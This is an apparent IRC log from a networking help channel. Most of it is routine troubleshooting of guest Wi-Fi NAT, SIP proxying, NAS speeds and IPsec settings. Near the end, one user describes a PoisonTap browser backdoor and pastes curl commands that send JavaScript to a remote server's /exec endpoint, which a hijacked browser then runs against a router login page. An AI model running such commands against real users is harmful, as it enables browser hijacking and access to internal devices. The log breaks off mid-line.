11:20 <+catphish> wadadli: yes wlan 1 should be in bridge hotspot 11:20 < wadadli> Now the router is in bridge mode. 11:20 < wadadli> Before it was in router mode 11:21 < wadadli> https://imgur.com/a/tb3Pa 11:26 < wadadli> catphish: ok, working. 11:27 < wadadli> Now I have wlan3 in bridge-guest 11:27 < wadadli> I take it I should be able to give these guys a different IP network. 11:28 <+catphish> yep 11:41 < wadadli> hrm for some reason clients on the Guest AP arne't getting an IP from the DHCP server although it's configured on the bridge-guest interface. 11:41 < wadadli> which has the guest-wlan3 virtual interface. 11:42 < wadadli> ah nvm forgot to assign the pool to the dhcp server 11:46 < wadadli> so guest are on 10.5.60.0/24 and have no access to the internet 11:47 <+catphish> you might need to check the NAT rules 11:47 <+catphish> it's hard to say what's wrong without seeing the full config 11:48 < wadadli> should their gateway be 10.5.60.1? 11:49 <+xand> if that's the router 11:50 < wadadli> Nope it isn't. 11:50 < wadadli> router is 192.168.1.2 11:50 <+xand> that's not a valid router for 10.5.60.0/24 11:50 <+catphish> their gateway should be on their subnet 11:51 <+catphish> ie the AP of your router-access-point thing on that interface 11:51 <+xand> the router should have an address inside 10.5.60.0/24 11:51 <+catphish> *IP 11:51 <+catphish> so the router / AP should have an IP like 10.5.60.1 11:51 <+catphish> and that should be the gateway 11:52 < wadadli> https://imgur.com/a/peFNl 11:52 < wadadli> Like this? 11:52 < wadadli> I have 10.5.60.1 on the bridge-guest 11:54 <+catphish> you have the same IP on 2 interfaces 11:54 <+catphish> you need to fix that 11:54 <+catphish> oh, no you dont' 11:54 <+catphish> never mind 11:55 <+catphish> it seems a little muddles in the wifi interface naming 11:56 < wadadli> https://imgur.com/a/Edmu2 11:56 < wadadli> wlan1 is master 11:57 < wadadli> guest-wlan3 and staff-wlan2 are virtual 11:59 <+catphish> ok, makes sense 11:59 <+catphish> well it all looks good 12:04 < wadadli> hrm. 12:07 < wadadli> https://imgur.com/a/WyPV3 12:07 < wadadli> This is what I am getting 12:08 < hey2> hngh 12:08 < hey2> have a robot that is going around changing MACs to FFFFFFFFFFFF 12:08 < hey2> what happens when you have multiple devices with 0xFFFFFFFFFFFF 12:09 < hey2> does all the traffic just get broadcast everywhere and consume all the bandwidth? 12:10 <+catphish> wadadli: looks like the connection to the router is OK, you probably need to look at your NAT rules next 12:11 < wadadli> hrm 12:12 <+catphish> open up your firewall, look at the nat section 12:12 <+catphish> see what's there 12:12 < wadadli> ya here 12:13 < wadadli> do I need to masquerade the network? 12:14 < wadadli> this is what I see 12:14 < wadadli> https://imgur.com/a/dQIYU 12:14 <+catphish> yeah you need a masquerade 12:14 <+catphish> for the new network 12:16 < wadadli> did that no different 12:16 < wadadli> maybe need to reboot router? 12:16 < wadadli> or renew lease? 12:27 < wadadli> just can't make it out to the internet 12:27 < djph> ping the gateway? 12:28 < djph> *the router's gateway 12:28 < wadadli> while on the network? 12:30 < wadadli> I could do that but I'd have to force cmd to use that network. 12:31 < light> if you have to force it to use the right network then what makes you think your browser is using the right network? 12:32 < wadadli> Because I'm forcing the browser. 12:33 < light> why are you forcing stuff at all? 12:33 < wadadli> Because Windows. 12:33 < light> are you doing weird stuff? 12:33 < wadadli> Never the less, let's not worry over that aspect as it is entirely valid and not the issue here. 12:33 < light> what's the issue? 12:34 < wadadli> read up. 12:34 < light> no thanks 12:37 < djph> light: I believe "forcing the network" is now :) (although, if it's wlan0 vs. eth0 ... ehhhh) 12:40 < wadadli> maybe I should trying making the gateway for this network the gateway of the router. 12:40 < wadadli> instead of the network gateway 12:41 < light> I find a diagram always helps 12:42 < djph> light: s/a diagram/liquor/ 12:43 < wadadli> I guess the answer to how do you know it's using the right network is webrtc leaking in my favour? 12:43 < wadadli> oh yeah, that and hours of verification. 12:46 < wadadli> https://imgur.com/a/c0VuU 13:39 < funabashi> Hi anyone into Tufin Securetrack? 13:40 < djph> no 13:40 < djph> well, maybe "someone" is ... 13:46 < bezaban> sounds like a hobbit 13:50 < mAniAk-_1> funabashi: a bit 15:03 < funabashi> mAniAk-_1: do you maybe know if i can check arp tables on devices via the rest api? 15:23 < mAniAk-_1> no, not sure if it collects arp 15:58 < CuriosTiger> PanOS 8.1.0 breaks...software updates. 15:58 < CuriosTiger> That's kind of special. 17:01 < gtrmtx> how should i go about redirecting all sip requests to a different address? 17:03 < bn_work> ok, stupid question, but why is this https://www.google.com/search?q=1Gbit%2Fs%2F8&oq=1Gbit%2Fs%2F8 not giving me 125MBps? Is Google misparsing? 1Gbit/s / (8bit/byte) = 1 x 10^9 / 8 = 125 x 10^6 17:04 < shtrb|laptop> gtrmtx, have a proxy or rewite the requests 17:04 < shtrb|laptop> SIP + SDP 17:05 < gtrmtx> shtrb|laptop, i have a proxy set up in apache that seems to be redirecting the http requests 17:05 < gtrmtx> but according to tcpdump my sip requests on udp 5060 are not making it to the desired server 17:06 < shtrb|laptop> gtrmtx, I'm talking about SIP proxy (depend on your server application different approach can be done) you can also fork some of the messages (based on answering lag) or you could behave as a gateway 17:07 < shtrb|laptop> gtrmtx, when you say redirect do you mean you wish to behave like a B2BUA/UA/whatever or send and forget ? 17:08 < bn_work> it's giving "15.62500 MBps" instead, which seems wrong? 17:08 < gtrmtx> hmm, not sure. its for an install of freepbx and i dont know which i would need 17:08 < shtrb|laptop> gtrmtx, c.f. https://en.wikipedia.org/wiki/Back-to-back_user_agent#Call_flow_diagram 17:08 < gtrmtx> yeah im looking at that page already 17:08 < gtrmtx> give me a sec 17:09 < shtrb|laptop> gtrmtx, #freepbx could give you direct assitance as long as you express exactly what you wish to do 17:10 < gtrmtx> ive been in #freepbx quite a bit. they would tell me that i need to ask elsewhere, as my issue is with initiating communication with the server, and not the server itself 17:10 < shtrb|laptop> ok , does your freepbx is able to interact with the other side ? 17:10 < shtrb|laptop> the other side is a UAS or a UA ? 17:10 < gtrmtx> via http, yes 17:11 < gtrmtx> i can reach the pbx gui via http 17:11 < shtrb|laptop> That is not what I have asked 17:11 < gtrmtx> oh sorry 17:11 < gtrmtx> can you reword? i dont quite understand what youre asking 17:12 < gtrmtx> what do you mean by 'other side' 17:12 < gtrmtx> my endpoints? 17:12 < djph> I believe he's asking if a "UAS" (whatever that is to freepbx) can talk to freepbx 17:12 < shtrb|laptop> UA@gtrmtx.home ---> freepbx ---> some XXX server 17:12 < shtrb|laptop> sorry , UAS - user agent server 17:12 < djph> or that ... 17:12 < shtrb|laptop> B2BUA - back to back User agent 17:13 < djph> phones suck :) 17:13 < shtrb|laptop> UA - user agent (client application like pjsip/yate/sipme whatever) 17:13 < gtrmtx> oh ok, so ua/uas basically means extenstion endpoints? 17:13 < ||cw> bn_work: that's pretty weird 17:14 < TandyUK> its a proxy in any other language 17:14 < shtrb|laptop> djph, networking sucks we should come back to smoke signals ! 17:14 < djph> shtrb|laptop: way ahead of you ... have RFC#(????) prepared for IPoSS 17:14 < gtrmtx> shtrb|laptop, my client applications are not able to interact with freepbx 17:14 < shtrb|laptop> IP over avian rocks ! 17:15 < shtrb|laptop> gtrmtx, now you ate talking ! 17:15 < bn_work> ||cw: am I going nuts? is Google, a company with some of the most brilliant minds getting basic unit conversion wrong? 17:15 * gtrmtx just has to learn the language 17:15 < gtrmtx> :) 17:15 < shtrb|laptop> gtrmtx, do both client are register to freepbx 17:15 < djph> shtrb|laptop: no no, that's IPoACo (IP Over Avian Coconut) 17:15 < shtrb|laptop> which language ? 17:15 < gtrmtx> the terminology that you are using 17:15 < Apachez> Internet Protocol over Asian Companies 17:15 < gtrmtx> neither client is able to register with the pbx 17:16 < shtrb|laptop> gtrmtx, did you setup register on freepbx ? 17:16 < ||cw> bn_work: yeah something is parsing odd. this one works "1 gbit/s in mbyte/s" 17:16 < gtrmtx> yes 17:16 < gtrmtx> hold on though 17:16 < gtrmtx> im typing out my setup 17:16 < shtrb|laptop> RFC2549 ! 17:17 < shtrb|laptop> Apachez, are Asian Companies deliver more cat pics per second ? 17:17 < bn_work> ||cw: yeah, I eventually found that too, but I was like "??.... that doesn't seem right" :/ 17:17 < bn_work> sigh... 17:18 < shtrb|laptop> c/s (Cat (mammal ) picture per second ) is the only true network metric ! 17:18 < gtrmtx> mydomain.com is an ubuntu 16.04 server with webspace site1(my website), and it has an internal address of x.x.x.1. also installed on this server is a qemu vm of the freepbx, with internal address of x.x.x.2 17:18 < gtrmtx> pbx.mydomain.com is routing http requests to site2 without any issue 17:18 < gtrmtx> using proxypass and proxypassreverse 17:18 < gtrmtx> however 17:18 < shtrb|laptop> gtrmtx, who says that x.x.x.1 can really interact with x.x.x.2 ? 17:19 < gtrmtx> they are already interacting via http successfully 17:19 < shtrb|laptop> how are they interconnected ? routing ? vpn ? 17:19 < shtrb|laptop> missed about proxypass/proxypassreverse 17:19 < gtrmtx> yeah 17:20 < gtrmtx> so pp/ppr are set up on x.x.x.1 17:20 < gtrmtx> and sending http to x.x.x.2 without a problem 17:20 < gtrmtx> but my sip requests are not appearing to follow the same rules 17:20 < shtrb|laptop> Can you remove apache proxying out of the loop to avoid problems ? 17:20 < shtrb|laptop> SIP != HTTP 17:20 < gtrmtx> right 17:20 < TandyUK> what are you suing to proxy the sip requests? 17:20 < TandyUK> using* 17:21 < TandyUK> and RTP for that matter 17:21 < gtrmtx> well, i tried editing my hosts file 17:21 < gtrmtx> but that didnt work 17:21 < TandyUK> what program 17:21 < TandyUK> apache doesnt do SIP/RTP 17:21 < shtrb|laptop> TandyUK, he used apache 17:21 < TandyUK> apache speak http/https 17:21 < gtrmtx> i guess im honestly in this room to ask what best practice is 17:21 < gtrmtx> im not in here saying i had it working 17:21 < gtrmtx> more like i want to make it work 17:21 < TandyUK> im asking yo ua question 17:21 < shtrb|laptop> I think that setuping up vpn or routing will be the best option for you 17:21 < TandyUK> what program, on the x.x.x.1 host, are you using to do this proxying 17:22 < gtrmtx> for sip, nothing. im asking what i should use 17:22 < gtrmtx> for http, apache 17:22 < TandyUK> nothing, you shouldnt proxy it imho 17:22 < TandyUK> if you do, expect issues 17:22 < gtrmtx> ...its not working at all though 17:22 < TandyUK> sip and proxies do NOT play nicely 17:22 < shtrb|laptop> Because otherwise you need to add a VIA , rewirte the IP part and SDP 17:23 < shtrb|laptop> TandyUK, SIP and proxy works ok if you know what you do (RTP is the one that doesn't like NAT) 17:23 < TandyUK> hmm with significant fiddling, it can work, but its far from reliable 17:23 < TandyUK> (this is coming from a VOIP provider) :P 17:23 < gtrmtx> what route would i take though? 17:23 < gtrmtx> is this a dns thing? 17:23 < shtrb|laptop> How hard it to setup STUN ?! 17:23 < gtrmtx> or what? 17:23 < shtrb|laptop> no 17:24 < shtrb|laptop> TandyUK, I guess your sample is just bigger than mine 17:24 < gtrmtx> not a dns thing? 17:24 < TandyUK> STUN doesnt help wit hthe mangling of packets 17:24 < TandyUK> sure we get the irght WAN ip 17:24 < TandyUK> and as soon as you introduce SIP/TLS, have fun with that :P 17:25 < shtrb|laptop> it will avoid SDP rewrite needs , and a decent sip router should do other magic 17:25 < gtrmtx> there is no router that i have access to 17:25 < gtrmtx> this is all on a digitalocean droplet 17:25 < shtrb|laptop> Can I start a Kamailio vs Opensips flame war ? 17:25 < shtrb|laptop> sip-router is an application 17:26 < gtrmtx> oh 17:26 < shtrb|laptop> OpenSer is the only true SIP service provider ! 17:26 < gtrmtx> is that something that could work for me? 17:26 < TandyUK> [16:21] what program, on the x.x.x.1 host, are you using to do this proxying << Kamailio would have been a suitable answer to this 17:27 < TandyUK> or perhaps opensips, but i dont use that 17:27 < gtrmtx> so you set it up on x.x.x.1, and it acts as a transparent middle man? 17:28 < TandyUK> and to be clear, im saying proxying sip, client side, eg with a sip 'helper' on the client end firewall, is the bad thing 17:28 < TandyUK> aka ALG 17:28 < shtrb|laptop> TandyUK, that is like sending a Tomahawak to handle get rid a raccoon 17:28 < TandyUK> if your provider end is setu pcorrectly, it should be totally unnecesary 17:28 < shtrb|laptop> gtrmtx, first please join the machines via routing / vpn what suite you more 17:29 < gtrmtx> TandyUK, but using a sip router is ok? 17:29 < shtrb|laptop> then you can choose your sip option 17:29 < gtrmtx> shtrb|laptop, what do you mean? 17:29 < gtrmtx> they are all on the same subnet 17:29 < gtrmtx> i dont know what more you are getting at 17:29 < shtrb|laptop> gtrmtx, if you need a proxy that mean they are not connected 17:30 < TandyUK> wait wait.... x.x.x.1 and x.x.x.2 are *public* ips right? 17:30 < shtrb|laptop> no! 17:30 < gtrmtx> no theyre private 17:31 < TandyUK> so you have to have some sort of NAT going on 17:31 < shtrb|laptop> that is why I ask nuke the proxy and connect them (routing or vpn or bind the networks) 17:31 < TandyUK> or proxy, or whatever 17:31 < TandyUK> for clients out in the world to connect 17:31 < shtrb|laptop> or all client must join his VPN / Network 17:31 < TandyUK> if x.x.x.1 and x.x.x.2 cant communicate directly, with NO assistance, your network is fubar 17:32 < shtrb|laptop> :D 17:32 < shtrb|laptop> TandyUK, what's your take on WebRTC to SIP gateways ? 17:32 < gtrmtx> TandyUK, shtrb|laptop , x.x.x.1 = actual internal address of server. x.x.x.2 = assigned internal address of virtualized server running on the physical machine with address x.x.x.1 17:32 < TandyUK> stop swearing 17:32 < shtrb|laptop> TandyUK, sorry what ? 17:32 < TandyUK> TandyUK, what's your take on WebRTC to SIP gateways ? 17:32 < TandyUK> ^^ 17:33 < shtrb|laptop> lol 17:33 < gtrmtx> TandyUK, x.x.x.1 and x.x.x.2 can communicate with each other without any proxying 17:33 < shtrb|laptop> gtrmtx, so why did you plugged a proxy in between ? 17:34 < gtrmtx> because x.x.x.1 is where all public requests go first, and the pbx is on x.x.x.2 17:34 < shtrb|laptop> is x.x.x.1 some kind of firewall/ load balancer machine ? 17:35 < gtrmtx> nope 17:35 < TandyUK> how do they get to x.x.x.1 using that ip? 17:35 < TandyUK> x.x.x.1 is his host, x.x.x.2 is a vm on it 17:36 < gtrmtx> yes 17:36 < TandyUK> the host must have some different IP for WAN 17:36 < gtrmtx> mydomain.com > public ip > x.x.x.1 17:37 < shtrb|laptop> gtrmtx, do you have something like 172.168.1.1 on host and 192.168.1.2 on guest ? 17:37 < shtrb|laptop> (if 172.16.1.1 would be public ip routable ip) 17:37 < gtrmtx> 192.168.122.1 and 192.168.122.36 are the actual addresses 17:37 < gtrmtx> .36 assigned via dhcp 17:37 < bn_work> so I don't get it, I have a server connected at 1Gb/s ethernet to a Linksys RVS4000 router that is connected to a 8-port Netgear GS108 switch at 1Gb/s which is connected to an ioMega StorCenter ix2 NAS at 1Gb/s, yet an SMB file transfer is going at like ~7MB/s, no other users, what gives? 17:37 < TandyUK> dhcp on a server.. seriously 17:37 < gtrmtx> but for simplicity, x.x.x.1 and x.x.x.2 17:38 < TandyUK> do yourself a massive favour right now and go set its ip statically 17:38 < gtrmtx> TandyUK, adminned by digitialocean, not me 17:38 < TandyUK> or youre in a world of pain when the lease expires 17:38 < shtrb|laptop> ok, but 192.168.122.1 has another ip (public ) ? 17:38 < gtrmtx> yes 17:38 < TandyUK> your Guest VM is adminned by DO? 17:38 < grawity> bn_work: what SMB server software, what SMB client software, what protocol version in between, have you tested non-SMB transfers? 17:38 < gtrmtx> TandyUK, no 17:38 < TandyUK> do yourself a massive favour right now and go set its ip statically 17:38 < TandyUK> or youre in a world of pain when the lease expires 17:38 < gtrmtx> i can do that 17:39 < gtrmtx> but will sip router be adequate to reroute sip requests in this configuration? 17:39 < bn_work> actually, I take that back... s/server/i7 3GHz + 16GB RAM + W7 Pro x64/ 17:39 < shtrb|laptop> sip-router (not ALG) is a carrier grade solution - so yes 17:39 < gtrmtx> ok cool 17:40 < bn_work> grawity: SMB is whatever iOMega is using under the hood, client side is W7 x64 OS's native client, how could I check protocol version? 17:40 < shtrb|laptop> wireshark 17:40 < bn_work> (I belive ioMega is using a modified Linux OS, no?) 17:42 < ||cw> bn_work: IX2 has a Marvell 1 GHz cpu, it's crap. that's all you'll get for samba because samba is CPU heavy 17:43 < ||cw> FTP will be pretty fast, sftp faster than samba but not by much 17:44 < shtrb|laptop> Using FTP is asking to be hacked 17:44 < ||cw> well, if it's just a home LAN.... 17:45 < ||cw> but anyway, it's just to show the network is fine 17:45 < ||cw> no one wants to use ftp for a lcoal NAS 17:45 < grawity> what makes samba "cpu heavy" 17:46 < ||cw> the CIFS protocol 17:46 < ||cw> it's a combo of the marvel cpu being extra crappy and the small amount of ram 17:46 < gtrmtx> TandyUK, what do i need to set in kamailio to route sip traffic to x.x.x.2? 17:47 < djph> grawity: MS garbage code on top of MS garbage FS? 17:47 < grawity> djph: maybe in some alternate reality where samba runs on windows/ntfs 17:48 < grawity> if the CIFS protocol is the problem, see if the NAS vendor has a firmware upgrade with SMB2/SMB3 support 17:48 < shtrb|laptop> djph, samaba (the software) normally is setup over non Win machines :) 17:48 < grawity> both for performance improvements, and because MS themselves are dropping CIFS 17:48 < ||cw> grawity: it's not heavy on desktop class CPU, but it's extra heavy on the marvel because it's an old embedded CPU with gigE patched on it to sell cheap NASs 17:49 < grawity> I doubt SFTP with crypto on top would be less heavy 17:49 < shtrb|laptop> in that case use WEBDAV[s] or better sftp (less traffic and much faster if you enable compression ) 17:49 < shtrb|laptop> grawity, SFTP is less chatty that SMB/CIFS 17:49 < djph> grawity: oh, mistook it as (MS) SMB running on a winbox 17:50 < grawity> shtrb|laptop: another reason to see if there's SMB2 support, imo 17:50 < ||cw> I havea similar class synology NAS with a slightly better CPU, i rarely get better than 20MB/s via samba, and that's with SMB3 support 17:51 < ||cw> my previous nas had a marvel and 128MB ram, that was a performance killer 17:52 < shtrb|laptop> wasn't SMB2 disabled by default today ? (with SMBv1 ) 17:52 < ||cw> might be 17:53 < shtrb|laptop> just checked with Win10 SMBv2 is disabled by default 17:54 < grawity> how did you check 17:55 < grawity> all Win10 systems I've seen, SMBv2/3 is on by default, SMBv1 also used to be on, new installs have an "autodetector" thingy that keeps stats and eventually disables v1 17:55 < grawity> djph: speaking of alternate reality, have you seen the latest opensource app from MS 17:56 < shtrb|laptop> I have a clean win10 installation ( and https://support.microsoft.com/en-us/help/2696547/how-to-detect-enable-and-disable-smbv1-smbv2-and-smbv3-in-windows-and ) but 1 was enabled 17:56 < grawity> yeah, 1 will be enabled at first, and magically disappear after a few weeks if the service counts no usages 17:56 < shtrb|laptop> or untill I will get an update !@$!@ 17:57 < Demos[m]> doesn't samba default to smb1 connections until recently 17:57 < djph> grawity: errr 17:57 < shtrb|laptop> grawity, are the extra features that go disabled after time ? 17:58 < grawity> shtrb|laptop: ? 17:58 < ||cw> Demos[m]: depends on the build options 17:58 < shtrb|laptop> grawity, you said it will magically disappear , so I ask if there other things that should stop working (what hell to expect ) 17:58 < grawity> no, just smbv1 17:59 < Demos[m]> well I mean for most distros 17:59 < shtrb|laptop> grawity, thanks 18:05 < Simeri> ping 8.8.8.8 18:06 < skyroveRR> ping Simeri 18:06 < Simeri> sorry having trouble with my chat window 18:06 < skyroveRR> Yeah me too 18:22 < Orbixx> Is there a way I can temporarily relieve bad latency on a route by putting a server in between the source and destination that has good latency to both source and destination? 18:23 < shtrb|laptop> You mean to interfere with the next hop ? 18:24 < ||cw> assuming that adding up the 2 "good" latencies and adding in the forwarding relay latency is less than "bad" latency, sure 18:24 < ||cw> shtrb|laptop: I was assuming more like a proxy 18:25 < shtrb|laptop> sorry was thinking about some kind of least cost routing or other approach 18:25 < Orbixx> shtrb, yes 18:26 < ||cw> bouncing off a server isn't exactly routing though 18:26 < shtrb|laptop> I thought about avoiding it (if you control the path ) 18:26 < Orbixx> No, quite 18:28 < Orbixx> I only have control of the source and all the equipment behind it, I don't control any parts of the path or the destination 18:28 < Orbixx> The NOC might take a while to resolve the absurdly long route they're taking, so I want to figure out something to temporarily improve the route 18:28 < Orbixx> It doesn't have to be perfect, as it will be ripped out again once the route is fixed 18:29 < shtrb|laptop> Orbixx, setup a ppp connection after the bad server , and route all trafic over that ppp 18:34 < shtrb|laptop> Which is like ||cw suggested (a "proxy") 18:35 < shtrb|laptop> gtrmtx, sip-router.org , opensips.org , kamailio.org 18:35 < gtrmtx> shtrb|laptop, following this right now: https://medium.com/southbridge-io/kamailio-sip-proxy-installation-and-minimal-configuration-example-c96b5729853a 18:37 < shtrb|laptop> I think that config and version is slightly old ... (centos 6.8 ) 18:50 < IamTrying> I need to setup IPSec Pre-shared connection from my CentOS. Network administrator of my client asked me two complicated question, felt like my tooth will fall out to answer them. 18:50 < IamTrying> 1) Phase 2 DH settings? 2) local encryption domain 18:50 < IamTrying> What is it? 18:53 < djph> 1. the IKE phase 2 diffie-hellman settings. 2. a.b.c.d/24 18:53 < djph> 3. you should probably brush up your CV 18:54 < djph> (3. only if your dayjob is networking) 18:54 < shtrb|laptop> DH settings - Deffi Hellman groups (you need to give info about your IKE phases ) 18:55 < shtrb|laptop> IamTrying, Check shrew or racoon if you wish to jump into deep water 18:55 < IamTrying> djph: DHG = is none , that is host a.b.c.d/24 is it left or right? in my CentOS i have left domain and right domain 18:55 < jamesc> please bear with me, I am doing some security research on my home network: I have a publicly accessible aws server, a program that generates thousands of iframes to different urls and force caches the urls in the browser, generates an outbound web socket to this server, from the server I issue a command to make the browser open a url, but I get a CORS error in the dev tools console like this https://pastebin.com/Hw8FSS35 18:56 < IamTrying> djph: not networking guru, but 10 years ago i did IPSec once and never did not like daily job. 18:56 < IamTrying> shtrb|laptop: IKE phases? is it not AES128 MD5? 18:57 < jamesc> i think i am getting a little lost on what exactly is happening, I can answer any questions on my setup, but would really appreciate some help following all this along 18:57 < djph> jamesc: err, what? 18:57 < grawity> I'd strongly suggest avoiding racoon 18:57 < jamesc> what's up 18:57 < IamTrying> Select one Diffie-Hellman group (1, 2, 5, or 14 through 21). The remote peer or dialup client must be configured to use the same group. 18:58 < IamTrying> But but but DHG i dont need? 18:58 < shtrb|laptop> grawity, I suggested that and shrew because it let you feel everything 18:58 < grawity> feel the mold 18:59 < IamTrying> djph: a.b.c.d/24 that i have to choose is it left or right? In my StrongSWAN left and right subnet i need to define. 19:00 < IamTrying> My client gave me his encryption domain as: x.y.x.y/24 should i use it in my config as left or right? 19:00 < grawity> one side is your local system, other side is the remote system 19:00 < grawity> traditionally left is yours, right is remote 19:00 < grawity> but strongswan does not care much really 19:01 < jamesc> djph what exactly was confusing i can clear it up 19:02 < djph> jamesc: missed it in hte scrollback 19:02 < jamesc> ok 19:02 < jamesc> so in that pastebin, you can see the CORS error 19:03 < IamTrying> OK - grawity, thank you. 19:03 < jamesc> but when I try to load the requested resource manually 19:03 < jamesc> i never get that error 19:03 < shtrb|laptop> jamesc, Are you the one behind pwnet ?! 19:03 < shtrb|laptop> *pwnat 19:03 < jamesc> ie i navigate to "http://192.168.0.1.ip.samy.pl/login" and it loads "http://buckeye-lab.smartrg.com/prime-home/control-panel/login?device=1XX" 19:03 < grawity> fairly sure samy's name is samy and not james 19:03 < jamesc> no 19:04 < shtrb|laptop> oh 19:04 < jamesc> yeah 19:04 < shtrb|laptop> because samy.pl is THE Samy 19:04 < jamesc> im just messing with poisontap on my home network 19:04 < grawity> but anyway, the error is ... literally how CORS works 19:05 < grawity> if site A wants to touch site B in some way, then site B needs to allow it via a special HTTP header 19:05 < shtrb|laptop> jamesc, you shall not mix stuff 19:05 < jamesc> ok 19:05 < grawity> unless site A completely opts out of things like sending credentials 19:05 < ||cw> jamesc: loads how 19:07 < jamesc> but why can i load the page from a different tab 19:07 < ||cw> jamesc: because "loads how" is important here. opening in a new tab is a new context, CORS doesn't apply 19:08 < jamesc> i have one tab open that the server has access to, and i execute a command to load "http://192.168.0.1.ip.samy.pl/login" it gets the CORS error 19:08 < jamesc> ok 19:08 < jamesc> loads with 19:08 < ||cw> "execute a command to load " means what, exactly? 19:08 < jamesc> a curl command from the server 19:08 < shtrb|laptop> jamesc, ajax and others are normally blocked by default 19:09 < jamesc> the tab open in chrom has a websocket open to the server 19:09 < jamesc> from the server, I issue a curl command to get "http://192.168.0.1.ip.samy.pl/login" 19:10 < jamesc> the same get request i.e a new tab with "http://192.168.0.1.ip.samy.pl/login" succeeds 19:10 < jamesc> what is the difference between the two? 19:10 < ||cw> and what does the curl command do? 19:11 < ||cw> what does the web socket do with that? 19:11 < jamesc> curl 'http://ec2-18-188-133-5.us-east-2.ute.amazonaws.com:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",functaion(d)\{console.log(d)\})' 19:11 < shtrb|laptop> your browser does CORL check before it open stuff 19:11 < shtrb|laptop> you are missing some headers there ... 19:12 < ||cw> are you having curl return the buckeye page content through the websocket and then trying to render that in a div? 19:12 < shtrb|laptop> curl -H 'Origin: blabla' ... 19:13 < jamesc> the curl command executes the get request from the browser 19:14 < jamesc> it doesn't go through the websocket i dont think 19:14 < ||cw> and the curl command is giving the CORS message? 19:14 < shtrb|laptop> You are missing the headers , in your broweser open the network messages (or wireshark) and see exactly what is sent 19:14 < jamesc> the browser is 19:14 < jamesc> ok shtrb|laptop i will 19:15 < ||cw> how does the browser get it? 19:15 < shtrb|laptop> You need Origin + Access-Control-Request-Method and Access-Control-Request-Header 19:15 < shtrb|laptop> ||cw, there is an RFC for that 19:16 < ||cw> shtrb|laptop: you also need the target to be configured to respond saying that origin is allowed 19:16 < shtrb|laptop> RFC 6454 19:16 < shtrb|laptop> ||cw, that's the whole point :) 19:16 < ||cw> which I'm guessing isn't going to happen 19:17 < ||cw> so then the point is, what exactly is going on, and can the desired result be achieved without needing CORS 19:17 < shtrb|laptop> just fire up the correct headers ? 19:17 < ||cw> or use a different method? 19:18 < ||cw> but so far, i don't even know if its curl or the browser giving the CORS error, or why 19:18 < ||cw> nothing described so far implies CORS in any way 19:18 < shtrb|laptop> jamesc, just setup SSLKEYLOGFILE and wireshark to understand what is going on 19:18 < ||cw> a curl with a redirect does not need CORS 19:19 < grawity> ||cw: 1) "a program that generates thousands of iframes" 2) "generates an outbound web socket to this server, from the server I issue a command to make the browser open a url" 19:19 < ||cw> and "a command to load" can be 100 different things, from location.href to jquery.load() 19:20 < grawity> the exact command is not important, all of them do the same checks 19:20 < grawity> point is, site 1 inside an iframe is trying to navigate to site 2 19:22 < jamesc> yeah 19:22 < jamesc> so since it is from the browser, why is it engaging CORS? 19:22 < grawity> that's exactly why 19:23 < grawity> it's not from the browser *itself*, it's from site 1 (which is receiving those commands via websocket) 19:24 < jamesc> but the ajax request is originating from the browser 19:24 < jamesc> ultimately 19:24 < ||cw> loading an external site in an iframe doens't need cors either 19:24 < jamesc> the browser is making the get request 19:24 < ||cw> I just tested. 19:24 < grawity> jamesc: why do you think that's the important part? 19:24 < jamesc> im not sure im just trying to understand 19:25 < ||cw> jamesc: what ajax request? 19:25 < grawity> ||cw: combining that with JS does 19:25 < grawity> ||cw: e.g. if the outer page tries to navigate an iframe using JS 19:25 < grawity> jamesc: it's the browser itself that performs this blocking, too 19:25 < jamesc> if i make the same request in a different tab, it doesn't engage cors, but getting the command from the websocket to the browser doe 19:25 < grawity> jamesc: cors is engaged *by* the browser, not by the server 19:26 < grawity> the browser sees that the request is initiated by JS, and asks the server "hey is site 1 allowed to use you", and if not, then blocks the request 19:27 < ||cw> document.all("myiframe").src =... does not use CORS either 19:27 < ||cw> $("myiframe").load(..) might 19:27 < shtrb|laptop> why poisntap looks cool 19:27 < shtrb|laptop> *wow 19:28 < ||cw> jamesc: what exactly are you getting back over the websocket? 19:28 < ||cw> the page's HTML content? 19:28 < jamesc> so the server is rendering these sites 19:29 < jamesc> no 19:29 < ||cw> curl doens't render, it just returns content 19:29 < shtrb|laptop> that tool allow taking over all cookies and CDN shit 19:29 < jamesc> the websocket just issues commands 19:29 < jamesc> i just can't visualize this at all 19:30 < grawity> so start at step 1 19:30 < grawity> what do those commands look like? literally 19:30 < ||cw> jamesc: have you tried asking support for the tool you're using? 19:30 < grawity> step 2: what does the JS code look like which handles those commands 19:31 < djph> grawity: "bad" :D 19:32 < jamesc> this is the command: "curl 'http://ec2-18-188-133-5.us-east-2.ute.amazonaws.com:1337/exec?$.get("http://192.168.0.1.ip.samy.pl/login",functaion(d)\{console.log(d)\})'" now I am going to look at "function(d)" 19:32 < grawity> is that a command you run in a terminal, or a command you receive via websocket? 19:32 < jamesc> i issue it from the aws instance 19:33 < jamesc> the browser gets it 19:33 < jamesc> so both 19:33 < grawity> i'm 100% sure the browser is not getting that exact same command 19:34 < mervin> hey guys 19:34 < jamesc> what is it getting, or what is it turning it into? 19:34 < grawity> how should I know, it's on your computer and you're the one with Developer Tools available 19:34 < grawity> but I would *guess* that the script at /exec just forwards '$.get("http://192.168.0.1.ip.samy.pl/login",functaion(d)\{console.log(d)\})' or something similar 19:34 < shtrb|laptop> grawity, I said it several times , you check what the broser does (you can use SSLKEYLOGFILE ) 19:35 < grawity> you can press damn F12 19:35 < shtrb|laptop> sorry it was for jamesc 19:38 < jamesc> https://pastebin.com/dWXknCaH 19:41 < grawity> jamesc: that doesn't look like anything that was asked for 19:42 < jamesc> im not sure what SSLKEYLOGFILE 19:42 < jamesc> this is from dev tools 19:42 < grawity> but that's not websocket data, is it? 19:43 < grawity> if it's Chrome, clicking "WS" would filter websockets only, and each would have a tab with data 19:43 < shtrb|laptop> SSLKEYLOGFILE is a env veribale that you can use to decypher SSL/TLS traffic in wireshark (record what the browser does) - or look in the data tab (dev tools) 19:44 < shtrb|laptop> jamesc, https://jimshaver.net/2015/02/11/decrypting-tls-browser-traffic-with-wireshark-the-easy-way/ this is an example 19:44 < jamesc> yeah, i have it filtered by WS, im not sure why its empty, there is a webocket connection though 19:44 < grawity> reload to see it 19:47 < jamesc> WS is just empty 19:48 < jamesc> I can run curl 'http://ec2-18-188-133-5.us-east-2.compute.amazonaws.com:1337/exec?alert("hiya")' and have it pop a message 19:50 < jamesc> whoa, I just wrote "curl 